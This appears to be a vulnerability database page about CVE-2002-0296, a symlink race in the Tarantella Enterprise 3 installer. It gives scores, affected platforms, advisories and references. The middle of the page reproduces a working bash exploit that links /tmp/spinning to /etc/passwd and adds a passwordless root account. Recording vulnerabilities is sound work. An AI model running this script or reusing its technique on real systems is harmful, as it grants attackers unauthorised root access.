CVE-2002-0296
CVSS1.2
发布时间 :2002-05-31 00:00:00
修订时间 :2016-10-17 22:18:35
NMCOES    

[原文]The installation of Tarantella Enterprise 3 allows local users to overwrite arbitrary files via a symlink attack on the "spinning" temporary file.


[CNNVD]Tarantella Enterprise 3符号链接漏洞(CNNVD-200205-149)

        Tarantella Enterprise 3版本的安装存在漏洞。本地用户借助"spinning"临时文件中的符号链接攻击覆盖任意文件。

- CVSS (基础分值)

CVSS分值: 1.2 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:tarantella:tarantella_enterprise:3.0
cpe:/a:tarantella:tarantella_enterprise:3.11
cpe:/a:tarantella:tarantella_enterprise:3.10
cpe:/a:tarantella:tarantella_enterprise:3.20
cpe:/a:tarantella:tarantella_enterprise:3.01

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0296
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0296
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-149
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2002-02/0187.html
(VENDOR_ADVISORY)  BUGTRAQ  20020219 Another local root vulnerability during installation of Tarantella Enterprise 3.
http://marc.info/?l=bugtraq&m=101467193803592&w=2
(UNKNOWN)  BUGTRAQ  20020224 Exploit for Tarantella Enterprise installation (bid 4115)
http://www.securityfocus.com/bid/4115
(VENDOR_ADVISORY)  BID  4115
http://xforce.iss.net/xforce/xfdb/8223
(UNKNOWN)  XF  tarantella-tmp-spinning-symlink(8223)

- 漏洞信息

Tarantella Enterprise 3符号链接漏洞
低危 访问验证错误
2002-05-31 00:00:00 2005-10-20 00:00:00
本地  
        Tarantella Enterprise 3版本的安装存在漏洞。本地用户借助"spinning"临时文件中的符号链接攻击覆盖任意文件。

- 公告与补丁

        The vendor is reportedly aware of the vulnerability and plans to correct it in the next release.
        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21290)

Tarantella Enterprise 3 Symbolic Link Vulnerability (EDBID:21290)
unix local
2002-02-19 Verified
0 Larry W. Cashdollar
N/A [点击下载]
source: http://www.securityfocus.com/bid/4115/info

Tarantella Enterprise 3 contains a locally exploitable symbolic link vulnerability during it's installation procedure.

This vulnerability can be exploited to elevate privileges. An attacker anticipating the install of Tarantella could create a symbolic link to any file as '/tmp/spinning'. When the installation utility is run, the file pointed to by the link will be made world writeable.

The attacker may gain root privileges by overwriting a file such as '/etc/passwd'.

#!/bin/bash
#Larry W. Cashdollar  lwc@vapid.dhs.org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux.  run and wait.


echo "Creating symlink."

/bin/ln -s /etc/passwd /tmp/spinning

echo "Waiting for tarantella installation."

while true
do
echo -n .
if [ -w /etc/passwd ]
then
        echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
        su - tarexp
        exit
fi
done		

- 漏洞信息

13949
Tarantella Enterprise spinning Symlink Arbitrary File Overwrite
Local Access Required Race Condition
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- 漏洞描述

- 时间线

2002-02-19 Unknow
2002-02-19 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Tarantella Enterprise 3 Symbolic Link Vulnerability
Access Validation Error 4115
No Yes
2002-02-19 12:00:00 2009-07-11 10:56:00
Discovered by Larry W. Cashdollar of Vapid Labs.

- 受影响的程序版本

Tarantella Enterprise 3 3.20 0
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- IBM AIX 4.3.3
- IBM AIX 5.1
- Red Hat Linux 6.2
- RedHat Linux 7.2
- RedHat Linux 7.1
- RedHat Linux 7.0
- S.u.S.E. Linux 7.3
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SCO eServer 2.3.1
- SCO eServer 2.3
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Tarantella Enterprise 3 3.11
- Compaq Tru64 4.0 d
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- HP HP-UX 10.34
- HP HP-UX 10.30
- HP HP-UX 10.26
- HP HP-UX 10.24
- HP HP-UX 10.20
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- IBM AIX 5.1
- Red Hat Linux 6.2
- RedHat Linux 7.2
- RedHat Linux 7.1
- RedHat Linux 7.0
- S.u.S.E. Linux 7.3
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SCO eServer 2.3.1
- SCO eServer 2.3
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Tarantella Enterprise 3 3.10
Tarantella Enterprise 3 3.0 1
Tarantella Enterprise 3 3.0

- 漏洞讨论

Tarantella Enterprise 3 contains a locally exploitable symbolic link vulnerability during it's installation procedure.

This vulnerability can be exploited to elevate privileges. An attacker anticipating the install of Tarantella could create a symbolic link to any file as '/tmp/spinning'. When the installation utility is run, the file pointed to by the link will be made world writeable.

The attacker may gain root privileges by overwriting a file such as '/etc/passwd'.

- 漏洞利用

An exploit has been published:

- 解决方案

The vendor is reportedly aware of the vulnerability and plans to correct it in the next release.

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站